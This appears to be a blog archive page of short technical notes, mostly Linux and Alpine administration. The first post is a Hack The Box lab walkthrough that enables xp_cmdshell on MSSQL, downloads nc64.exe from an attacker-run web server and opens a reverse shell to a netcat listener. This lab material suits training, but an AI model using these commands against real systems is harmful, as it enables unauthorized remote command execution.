Showing posts from January, 2022

impacket install (for htb archetype)

sudo apt install nmap
nmap -sC -sV {TARGET_IP}

sudo apt install smbclient
smbclient -N -L \\\\{TARGET_IP}\\
-N : No password
-L : This option allows you to look at what services are available on a server
smbclient -N \\\\{TARGET_IP}\\backups

apt search impacket
sudo apt install impacket-scripts python3-impacket
impacket-mssqlclient.py ARCHETYPE/[email protected]{TARGET_IP} -windows-auth

find ip addr of vpn using:
ip addr

SQL> EXEC xp_cmdshell 'net user';
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
SQL> xp_cmdshell "whoami"

cd Downloads
sudo python3 -m http.server 80
sudo nc -lvnp 443

SQL> xp_cmdshell "powershell -c pwd"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe"
SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.139 443"
powersh

filter text

less, more = page reader
head = reads the first 10 lines
tail = last 10 lines by default

sort
cat /etc/passwd | sort

grep
search for pattern
cat /etc/passwd | grep "/bin/bash"
exclude pattern with -v
cat /etc/passwd | grep -v "false\|nologin"

cut
cat /etc/passwd | grep -v "false\|nologin" | cut -d ":" -f1
-f specifies field
-d delimiter (separator)

tr
replaces characters with others: as the first option, we define which character we want to replace, and as the second option, we define the character we want to replace it with
cat /etc/passwd | grep -v "false\|nologin" | tr ":" " "

column
displays in column form
cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | column -t

awk
first ($1) and last ($NF) result of the line
cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | awk '{print $1 , $NF }'

sed
The "s&quo

file descriptors

Data Stream for Input: STDIN – 0
Data Stream for Output: STDOUT – 1
Data Stream for Output that relates to an error occurring: STDERR – 2

Redirect errors to null
find /etc/ -name shadow 2>/dev/null

Redirect STDOUT to a File
find /etc/ -name shadow 2>/dev/null > results.txt

Redirect STDOUT and STDERR to Separate Files
find /etc/ -name shadow 2> stderr.txt 1> stdout.txt

Redirect STDIN
cat < stdout.txt

Redirect STDOUT and Append to a File
find /etc/ -name passwd >> stdout.txt 2>/dev/null

Redirect STDIN Stream to a File
cat << EOF > stream.txt
End-Of-File (EOF) function of a Linux system file, which defines the input's end.

Pipes
to use the STDOUT from one program to be processed by another.
find /etc/ -name *.conf 2>/dev/null | grep systemd
find /etc/ -name *.conf 2>/dev/null | grep systemd | wc -l
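
The redirections above, as an added shell example that is not part of the original post. emit() is a constructed stand-in for a command such as find that writes to both streams; the last two functions go slightly beyond the notes to show that redirections are applied left to right, which decides whether error messages land in the file or escape it.

```shell
#!/bin/sh
# Added example. emit() is a constructed stand-in for a command that
# writes a result to STDOUT and an error to STDERR, like find does.
emit() {
    echo "result: /etc/shadow"        # STDOUT (fd 1)
    echo "Permission denied" >&2      # STDERR (fd 2)
}

# Send the two streams to separate files in directory $1.
split_streams() {
    emit 1>"$1/stdout.txt" 2>"$1/stderr.txt"
}

# fd 1 is pointed at the file first, then fd 2 is made a copy of fd 1:
# both streams end up in the file.
both_to_file() {
    emit >"$1" 2>&1
}

# fd 2 is made a copy of fd 1 while fd 1 is still the caller's STDOUT,
# and only then is fd 1 pointed at the file: the error escapes the file.
wrong_order() {
    emit 2>&1 >"$1"
}

# Only STDOUT travels through a pipe; the error is discarded here.
count_stdout_lines() {
    emit 2>/dev/null | wc -l | tr -d ' '
}

demo() {
    tmp=$(mktemp -d)
    split_streams "$tmp"
    both_to_file "$tmp/both.txt"
    leaked=$(wrong_order "$tmp/wrong.txt")
    echo "stdout.txt: $(cat "$tmp/stdout.txt")"
    echo "stderr.txt: $(cat "$tmp/stderr.txt")"
    echo "both.txt lines: $(wc -l <"$tmp/both.txt" | tr -d ' ')"
    echo "escaped the file: $leaked"
    rm -rf "$tmp"
}
demo
```

Discarding STDERR with 2>/dev/null also hides permission errors, so an empty result can mean "not readable" rather than "not present".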

search linux

find

find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} \; 2>/dev/null

-type f
Hereby, we define the type of the searched object. In this case, 'f' stands for 'file'.

-name *.conf
With '-name', we indicate the name of the file we are looking for. The asterisk (*) stands for 'all' files with the '.conf' extension.

-user root
This option filters all files whose owner is the root user.

-size +20k
We can then filter all the located files and specify that we only want to see the files that are larger than 20 KiB.

-newermt 2020-03-03
With this option, we set the date. Only files newer than the specified date will be presented.

-exec ls -al {} \;
This option executes the specified command, using the curly brackets as placeholders for each result. The backslash escapes the next character from being interpreted by the shell because otherwise, the semicolon would terminate the command and not reach the redi

simple webserver

npm install http-server
http-server -p 8080

python
python3 -m http.server
python -m http.server 8000

php
php -S localhost:8000
php -S 127.0.0.1:8080

src::
https://www.npmjs.com/package/http-server
https://docs.python.org/3/library/http.server.html
https://www.php.net/manual/en/features.commandline.webserver.php

control system using anaconda

conda install numpy scipy matplotlib  # if not yet installed
conda install -c conda-forge control slycot
-----------------------------------------------------
# secord.py - demonstrate some standard MATLAB commands
# RMM, 25 May 09

import os
import matplotlib.pyplot as plt   # MATLAB plotting functions
from control.matlab import *      # MATLAB-like functions

# Parameters defining the system
m = 250.0   # system mass
k = 40.0    # spring constant
b = 60.0    # damping constant

# System matrices
A = [[0, 1.], [-k/m, -b/m]]
B = [[0], [1/m]]
C = [[1., 0]]
sys = ss(A, B, C, 0)

# Step response for the system
plt.figure(1)
yout, T = step(sys)
plt.plot(T.T, yout.T)
plt.show(block=False)

# Bode plot for the system
plt.figure(2)
mag, phase, om = bode(sys, logspace(-2, 2), plot=True)
plt.show(block=False)

# Nyquist plot for the system
plt.figure(3)
nyquist(sys)
plt.show(block=False)

# Root locus plot for the sys

polar plot anaconda

conda install numpy matplotlib
apt install vscodium
-----------------------------
import numpy as np
import matplotlib.pyplot as plt

# setting the axes proj as polar
plt.axes(projection='polar')

# setting the length
# and number of petals
a = 1
n = 6

# creating an array
# containing the radian values
rads = np.arange(0, 2 * np.pi, 0.001)

# plotting the rose
for rad in rads:
    r = a * np.cos(n * rad)
    plt.polar(rad, r, 'g.')

# display the polar plot
plt.show()
---------------------------------
https://www.geeksforgeeks.org/plotting-polar-curves-in-python/
https://docs.conda.io/en/latest/miniconda.html

runlevels

boot runlevels:
1. sysinit
2. shutdown
3. nonetwork
4. default
5. boot
-------
1. sysinit (/etc/runlevels/sysinit)
ln -s /etc/init.d/udev-trigger udev-trigger
ln -s /etc/init.d/dmesg dmesg
ln -s /etc/init.d/devfs devfs
ln -s /etc/init.d/udev udev

2. shutdown (/etc/runlevels/shutdown)
/etc/init.d/savecache
/etc/init.d/killprocs
/etc/init.d/mount-ro

3. empty

4. default
/etc/init.d/udev-postmount
/etc/init.d/seatd

5. boot
/etc/init.d/wpa_supplicant
/etc/init.d/networking
/etc/init.d/hostname
/etc/init.d/bootmisc
/etc/init.d/urandom
/etc/init.d/modules
/etc/init.d/hwclock
/etc/init.d/sysctl

net alpine

cat /etc/network/interfaces

auto lo
iface lo inet loopback

auto wlan0
iface wlan0 inet static
    address 192.168.1.242
    netmask 255.255.255.0
    gateway 192.168.1.254

cat /etc/wpa_supplicant/wpa_supplicant.conf

network={
    ssid="kwifi_ssid"
    #psk="wifi_password"
}

echo "shortname" > /etc/hostname
hostname -F /etc/hostname

::1 localhost ipv6-localhost ipv6-loopback
fe00::0 ipv6-localnet
ff00::0 ipv6-mcastprefix
ff02::1 ipv6-allnodes
ff02::2 ipv6-allrouters
ff02::3 ipv6-allhosts
192.168.1.150 shortname.domain.com

cat /etc/resolv.conf

nameserver 8.8.8.8
nameserver 1.1.1.1
# http://www.he.net/
nameserver 2001:470:20::2

modprobe ipv6
echo "ipv6" >> /etc/modules
---------
auto eth0
iface eth0 inet dhcp

iface eth0 inet static
    address 192.168.1.150/24
    gateway 192.168.1.1

iface eth0 inet static
    address 192.168.1.151/24

wpa_supplicant -i wl

swaybar status

status.sh

DATE=$(date "+%a-%b-%d-%Y %I:%M%p")
BATSTAT=$(cat /sys/class/power_supply/BAT0/status)
BATPERC=$(cat /sys/class/power_supply/BAT0/capacity)
VSTAT="$(amixer get Master)"
VMUTE=" "
echo "$VSTAT" | grep "\[off\]" >/dev/null && VMUTE="muted"
VOLUME=$(echo "$VSTAT" | grep -o "\[[0-9]\+%\]" | sed "s/[^0-9]*//g;1q")
WIFI="$(awk '/^\s*w/ { print "", int($3 * 100 / 70) "% " }' /proc/net/wireless)"
KBLAYOUT=$(swaymsg -t get_inputs | grep -m1 'xkb_active_layout_name' | awk -F '"' '{print $4}')
BNESS="$(brightnessctl get)"
MAX="$(brightnessctl max)"
BLPERC="$((BNESS*100/MAX))"
NIGHT=
pgrep wlsunset && NIGHT=
echo  $KBLAYOUT $NIGHT $BLPERC  $VMUTE $VOLUME  $WIFI   $BATPERC% $BATSTAT $DATE

bar {
    position top
    #swaybar_command waybar
    status_command while ~/.config/swa

middle click sway

~/.config/sway/config

input type:touchpad {
    tap enabled
    dwt enabled
    middle_emulation enabled
    natural_scroll disabled
    # accel_profile "adaptive"
    #pointer_accel 1
}

middle click use:
> select text and paste it with middle click, no hassle with ctrl+c/v
> open link in new tab
> open dock/launchers/folder in new window

get weather using curl

nano getweather.sh
-----------------------------------------
while [ 1 ]
do
    weather=$(curl -Ss 'https://wttr.in/Arjundhara?0&T&Q&format=1')
    echo "$weather"
    sleep 60
done
-----------------------------------------
src
https://github.com/chubin/wttr.in

powershell
Invoke-RestMethod https://wttr.in

HELP
curl wttr.in/:help

v2.wttr.in for data rich format

efistub boot using efibootmgr

sudo blkid   # to get root uuid and set label and efi partition

nano efi
--------------------------------------------------------------------------------
#!/bin/sh
params="root=UUID=2e5bf9f5-4dde-4c3f-aed4-50fbbf886be2 modules=sd-mod,usb-storage,ext4 quiet loglevel=3 initrd=\initramfs-lts"
efibootmgr --create --label "Alp" \
  --disk /dev/nvme0n1 --part 1 \
  --loader /vmlinuz-lts \
  --unicode "${params}" \
  --verbose
--------------------------------------------------------------------------------
#for archlinux
#!/bin/sh
params="root=UUID=a8023f6f-67a8-43db-a24d-d39ce5fdb45d quiet loglevel=3 initrd=\booster-linux.img"
efibootmgr --create --label "Arch" \
  --disk /dev/nvme0n1 --part 1 \
  --loader /vmlinuz-linux \
  --unicode "${params}" \
  --verbose
--------------------------------------------------------------------------------
sudo ./efi

src:  ht

realme debloat

pm disable-user --user 0 package.name.example
pm enable --user 0 package.name.example
pm list packages -d
pm uninstall --user 0 package.name.example
cmd package install-existing package.name.example
pm list packages
pm list packages | sort
pm list packages google
dumpsys package package.name.example
pm uninstall -k --user 0 package.name.example    :: keeps data
pm uninstall --user 0 package.name.example       :: delete data
--------------------------------------------------------------------------------
RMX2180:/ $ pm list packages
package:com.f1soft.esewa
package:android.frameworkres.overlay
package:com.android.fmradio
package:com.mediatek.gba
package:com.mediatek.ims
package:com.factory.mmigroup
package:com.android.cts.priv.ctsshim
package:com.google.android.youtube
package:com.google.android.ext.services
package:com.coloros.onekeylockscreen
package:com.coloros.phonenoareainquire
package:com.oppo.oppopowermonitor
package:com.android.providers.telephony
package:com.andro

glibc alpine

apk add gcompat
doas apk add flatpak

gentoo chroot

sudo apk add xz
mkdir ~/chroot
cd ~/chroot
tar -xvf stage3-*.tar.xz
tar -xvf portage-latest.tar.xz
mv portage usr
sudo mount --bind /dev dev
sudo mount --bind /sys sys
sudo mount -t proc proc proc
cp /etc/resolv.conf etc
sudo chroot . /bin/bash

https://wiki.gentoo.org/wiki/Handbook:Main_Page

gentoo-chroot.sh

#!/bin/bash
CHROOT_PATH="/home/$USER/chroot"
cd $CHROOT_PATH
mount | grep $CHROOT_PATH/dev || sudo mount --bind /dev dev
mount | grep $CHROOT_PATH/sys || sudo mount --bind /sys sys
mount | grep $CHROOT_PATH/proc || sudo mount -t proc proc proc
cp /etc/resolv.conf etc
sudo chroot --userspec=$USER:users . /bin/bash
echo "You must manually unmount $CHROOT_PATH/dev, $CHROOT_PATH/sys, $CHROOT_PATH/proc."

chmod +x gentoo-chroot.sh

Arch Linux

sudo apk add arch-install-scripts
mkdir ~/chroot && cd ~/chroot
curl -O https://mirrors.edge.kernel.org/archlinux/iso/latest/archlinux-bootstrap-2021.04.0

change shell alpine

apk add libuser

(1/6) Installing gdbm (1.22-r0)
(2/6) Installing mpdecimal (2.5.1-r1)
(3/6) Installing readline (8.1.1-r0)
(4/6) Installing python3 (3.9.7-r4)
(5/6) Installing popt (1.18-r0)
(6/6) Installing libuser (0.63-r0)
Executing busybox-1.34.1-r3.trigger

mkdir /etc/default
touch /etc/default/useradd
touch /etc/login.defs

If you want to change the current user's shell:
lchsh

If you want to change a different user's shell:
lchsh USERNAME

example
sudo lchsh root
Changing shell for kai.
Password:
New Shell [/bin/ash]: /bin/bash
Shell changed.

src: https://wiki.alpinelinux.org/wiki/Change_default_shell

alpine android adb fix

sudo apk add usbutils eudev android-tools

lsusb
Bus 001 Device 002: ID 0c45:671e Microdia Integrated_Webcam_HD
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 009: ID 22d9:2765 OPPO Electronics Corp. Oppo N1
Bus 001 Device 003: ID 0cf3:e009 Qualcomm Atheros Communications
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

udevadm info -q path -n /dev/bus/usb/001/009
/devices/pci0000:00/0000:00:14.0/usb1/1-3

udevadm info -p /devices/pci0000:00/0000:00:14.0/usb1/1-3
P: /devices/pci0000:00/0000:00:14.0/usb1/1-3
N: bus/usb/001/009
E: BUSNUM=001
E: DEVNAME=/dev/bus/usb/001/009
E: DEVNUM=009
E: DEVPATH=/devices/pci0000:00/0000:00:14.0/usb1/1-3
E: DEVTYPE=usb_device
E: DRIVER=usb
E: ID_BUS=usb
E: ID_MODEL=2765
E: ID_MODEL_ENC=2765
E: ID_MODEL_FROM_DATABASE=Oppo N1
E: ID_MODEL_ID=2765
E: ID_REVISION=0223
E: ID_SERIAL=realme_2765_FYLFUC5HCUNVKRLB
E: ID_SERIAL_SHORT=FYLFUC5HCUNVKRLB
E: ID_USB_INTERFACES=:ffff00:ff4201:
E: ID_VENDOR=realme
E: ID_VE

android (lineage os android 10 ) on debian/ubuntu using lxc

Installing Waydroid is easy

Dependencies:
python3
lxc
curl
Wayland session manager !!IMPORTANT!!

sudo apt install curl
export DISTRO="focal"   (debian bullseye)
curl https://repo.waydro.id/waydroid.gpg > /usr/share/keyrings/waydroid.gpg
echo "deb [signed-by=/usr/share/keyrings/waydroid.gpg] https://repo.waydro.id/ $DISTRO main" > /etc/apt/sources.list.d/waydroid.list
sudo apt update
sudo apt install waydroid
sudo waydroid init   (download android image)
sudo systemctl start waydroid-container
waydroid session start
waydroid show-full-ui
-----------------------------------------------------------------------------
autoinstall
wget https://raw.githubusercontent.com/aditya24raj/darth_waydr/main/darth_waydr.sh -O ~/Downloads/darth_waydr.sh && bash ~/Downloads/darth_waydr.sh
-----------------------------------------------------------------------------
for alpine linux (working sway/kde/gnome)
https://pkgs.al

alpine linux dualboot

https://wiki.alpinelinux.org/wiki/Setting_up_disks_manually#Manual_partitioning
https://wiki.alpinelinux.org/wiki/Dualbooting

apk add e2fsprogs
mkfs.ext4 /dev/sdXY
mount -t ext4 /dev/sdXY /mnt
mount boot/esp partition to /boot

setup alpine
say no to disk, config, and cache options
setup-disk -m sys /mnt

gksudo gedit /etc/grub.d/40_custom

#!/bin/sh
echo "Adding Alpine" >&2
cat << EOF
menuentry "Alpine Linux" {
    set root=(hd0,3)
    linux /boot/vmlinuz-lts root=UUID=8de6973a-4a8c-40ed-b710-c4e2b42d6b7a modules=sd-mod,usb-storage,ext4 quiet
    initrd /boot/initramfs-lts
}
EOF

on systemd-boot usage
copy vmlinuz-lts and initramfs-lts to / of $ESP if it's not mounted in setup
get UUID using sudo blkid and find the alpine partition (careful: PARTUUID looks the same)

nano/vi /boot/loader/entries/alpine.conf
------------------------------------------------------------------------------
title alpine linix
linux /vmlinuz-lts
initrd /initramfs-lts
options root=UUID=